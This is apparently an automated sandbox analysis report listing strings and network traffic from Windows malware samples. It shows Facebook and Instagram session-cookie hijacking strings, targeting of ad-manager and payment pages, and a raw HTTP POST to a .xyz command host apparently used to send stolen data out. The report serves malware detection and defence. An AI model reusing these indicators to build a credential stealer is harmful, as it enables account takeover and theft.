Source: Cyfj6XGbkd.exeString found in binary or memory: http://www.facebook.com/pages/VB-Audio-Software/396002733802606 equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exeString found in binary or memory: http://www.youtube.com equals www.youtube.com (Youtube)
Source: 56BB1610C0318054.exe, 00000004.00000003.375790359.0000000003D42000.00000004.00000001.sdmpString found in binary or memory: http://www.youtube.comT equals www.youtube.com (Youtube)
Source: 56BB1610C0318054.exe, 00000004.00000003.375790359.0000000003D42000.00000004.00000001.sdmpString found in binary or memory: http://www.youtube.comf equals www.youtube.com (Youtube)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/"name="fb_dtsg" value=""logout_hash":"""logout_hash":"logoutToken:""logoutToken:"https://www.facebook.com/comet/try/source=SETTINGS_MENU&nctr[_mod]=pagelet_bluebar&__user=&__a=1&__csr=&__req=14&__beoa=0&__pc=PHASED%3ADEFAULT&dpr=1&__ccg=EXCELLENT&fb_dtsg=&jazoest=for (;;);{https://m.facebook.com/logout.php?h=%s&t=%sc_user=deleted"encrypted":"https://m.facebook.com/?_rdr""name="fb_dtsg" value="logout.phpm_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__a=&__user=https://m.facebook.com/bookmarks/flyout/body/?id=u_0_6\https://m.facebook.com/logout.php%sc_user=deletedhttps://m.facebook.com/?soft=bookmarks"logoutURL":"\"logout.phphttps://m.facebook.com&source=mtouch_logout_button&persist_locale=1&button_name=logout&button_location=settings%s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/adsmanager/manage/ads equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/bookmarks/pages?ref_type=logout_gear equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/comet/try/ equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2 equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2&access_token=&expires_in=Location: query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: token = %s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopes equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesLocation: equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesocation: equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1 equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1x-auth-result: query_mess_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: x_auth_result = %s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1 equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri= equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri=origin: https://www.instagram.comsec-fetch-mode: corsreferer: https://www.instagram.com/sec-fetch-site: cross-sitefb-ar: equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp String found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/ equals www.facebook.com (Facebook)
Source: Cyfj6XGbkd.exe String found in binary or memory: qSOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio{83da6326-97a6-4088-9453-a1923f573b29},3{1da5d803-d492-4edd-8c23-e0c0ffee7f0e},3{1da5d803-d492-4edd-8c23-e0c0ffee7f0e},6{e4870e26-3cc5-4cd2-ba46-ca0a9a70ed04},0{f19f064d-082c-4e27-bc73-6882a1bb8e4c},0FRCFLCBRBLLFFCFRFLIsWow64ProcessKernel32.dllArial-inf db%0.1f db%0.1f %%%i bits%i Hz%i-Input Levelsb1024:b512:b256:b128:Init:Pull loss:Push loss:Buffers:StatisticsOutputres:sr:ch:Input%i smpMax Latency:Internal SR:%i.%i.%i.%iDriver Version:VB-Audio Virtual CableDriver Name:SYSTEM\CurrentControlSet\Services\VB-CableSOFTWARE\VB-Audio\CableVBAudioCableWDM_SRVBAudioCableWDMhttp://www.vb-audio.comhttp://www.facebook.com/pages/VB-Audio-Software/396002733802606The change will take effect on next launch... equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000003.390655999.0000000003813000.00000004.00000001.sdmp String found in binary or memory: s://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000003.390655999.0000000003813000.00000004.00000001.sdmp String found in binary or memory: s://www.facebook.com/chat/video/videocalldownload.phpbo\\O9 equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp String found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp String found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20191224.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp String found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20200229.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: unknown DNS traffic detected: queries for: 84cfba021a5a6662.xyz
Source: unknown HTTP traffic detected:
    POST //fine/send HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
    upgrade-insecure-requests: 1
    Content-Length: 82
    Host: 84cfba021a5a6662.xyz
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/81/58b810.gif
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/86/2042ed.woff
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA61Ofl.img?h=16&w=16&m
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA7XCQ3.img?h=16&w=16&m
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AABzUSt.img?h=368&w=622
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADsAOZ.img?h=333&w=311
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADsZuW.img?h=166&w=310
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuTp7.img?h=333&w=311
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuZko.img?h=75&w=100&
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv4Ge.img?h=75&w=100&
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv842.img?h=250&w=300
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv9IZ.img?h=75&w=100&
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbPR.img?h=250&w=300
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbce.img?h=166&w=310
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvhNP.img?h=166&w=310
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvhax.img?h=166&w=310
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvqEs.img?h=166&w=310
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvuGs.img?h=333&w=311
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvzqT.img?h=166&w=310
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzjSw3.img?h=16&w=16&m
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB16g6qc.img?h=27&w=27&
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17milU.img?h=16&w=16&
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18T33l.img?h=333&w=31
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xDME.img?h=75&w=100
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xGDT.img?h=166&w=31
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xMWp.img?h=75&w=100
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xaUu.img?h=166&w=31
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xssM.img?h=75&w=100
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xzm6.img?h=250&w=30
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yF6n.img?h=333&w=31
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yFoT.img?h=75&w=100
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yG8H.img?h=166&w=31
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yKf2.img?h=75&w=100
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19ylKx.img?h=75&w=100
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yuvA.img?h=250&w=30
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yxVU.img?h=166&w=31
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1kc8s.img?m=6&o=true&
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB6Ma4a.img?h=16&w=16&m
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hjL.img?h=16&w=16&m=
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBMQmHU.img?h=16&w=16&m
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBMVUFn.img?h=16&w=16&m
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&m
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBRUB0d.img?h=16&w=16&m
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBS0Ogx.img?h=75&w=100&
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuaWG.img?h=16&w=16&m
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBWoHwx.img?h=27&w=27&m
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBkwUr.img?h=16&w=16&m=
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BByBEMv.img?h=16&w=16&m
Source: MiniThunderPlatform.exe.2.drString found in binary or memory: http://store.paycenter.uc.cn
Source: MiniThunderPlatform.exe.2.drString found in binary or memory: http://store.paycenter.uc.cnmail-attachment.googleusercontent.com
Source: 56BB1610C0318054.exe, 00000002.00000003.409442821.0000000003810000.00000004.00000040.sdmpString found in binary or memory: http://support.apple.com/kb/HT203092
Source: 56BB1610C0318054.exe, 00000002.00000003.409442821.0000000003810000.00000004.00000040.sdmpString found in binary or memory: http://support.apple.com/kb/HT203092Zb5iS
Source: Cyfj6XGbkd.exeString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: Cyfj6XGbkd.exeString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: Cyfj6XGbkd.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: 56BB1610C0318054.exe, 00000002.00000003.389623868.0000000004129000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
Source: 56BB1610C0318054.exe, 00000004.00000002.380176244.000000000330F000.00000004.00000001.sdmpString found in binary or memory: http://www.interestvideo.com/video1.php
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://www.msn.com
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://www.msn.com/
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://www.msn.com/?ocid=iehp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate
Source: 1611970637183.exe, 00000009.00000002.384711842.0000000000198000.00000004.00000010.sdmpString found in binary or memory: http://www.nirsoft.net
Source: 1611970637183.exe, 1611970637183.exe.2.drString found in binary or memory: http://www.nirsoft.net/
Source: download_user.dll.2.drString found in binary or memory: http://www.openssl.org/support/faq.html
Source: download_user.dll.2.drString found in binary or memory: http://www.openssl.org/support/faq.html....................
Source: Cyfj6XGbkd.exeString found in binary or memory: http://www.vb-audio.com
Source: Cyfj6XGbkd.exeString found in binary or memory: http://www.vb-cable.com
Source: Cyfj6XGbkd.exeString found in binary or memory: http://www.vb-cable.comVBCABLE
Source: download_user.dll.2.drString found in binary or memory: http://www.xunlei.com/
Source: download_user.dll.2.drString found in binary or memory: http://www.xunlei.com/GET
Source: 56BB1610C0318054.exeString found in binary or memory: http://www.youtube.com
Source: 56BB1610C0318054.exe, 00000004.00000003.375790359.0000000003D42000.00000004.00000001.sdmpString found in binary or memory: http://www.youtube.comT
Source: 56BB1610C0318054.exe, 00000004.00000003.375790359.0000000003D42000.00000004.00000001.sdmpString found in binary or memory: http://www.youtube.comf
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;g
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736
Source: 56BB1610C0318054.exe, 00000002.00000003.409442821.0000000003810000.00000004.00000040.sdmpString found in binary or memory: https://A5D4CE54CC78B3CA.xyz/
Source: 56BB1610C0318054.exe, 00000002.00000003.390709942.0000000000838000.00000004.00000001.sdmp, Localwebdata1611970646229.2.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://accounts.google.com
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.com/nav/_/rpc/GaiaInfoService/Get?authuser=0&rpcTrackingId=GaiaInfoService.Get%3A
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.com/nav/_/rpc/UserByGaiaService/Get?authuser=0&rpcTrackingId=UserByGaiaService.Ge
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.com/nav/_/rpc/UserCustomerAccessService/List?authuser=0&rpcTrackingId=UserCustome
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.com/nav/selectaccount
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.com/nav/selectaccountocation:
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.comsec-fetch-dest:
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gt
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://amp.azure.net/libs/amp/1.8.0/azuremediaplayer.min.js
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://api.twitter.com/1.1/statuses/update.json
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://api.twitter.com/1.1/statuses/update.jsoninclude_profile_interstitial_type=1&include_blocking
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://apis.google.com
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC54c8a2b02c3446f48a60b41e8a5ff47
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC9b2d2bc73c8a4a1d8dd5c3d69b6634a
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc71c68d7b8f049b6a6f3b669bd5d00c
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
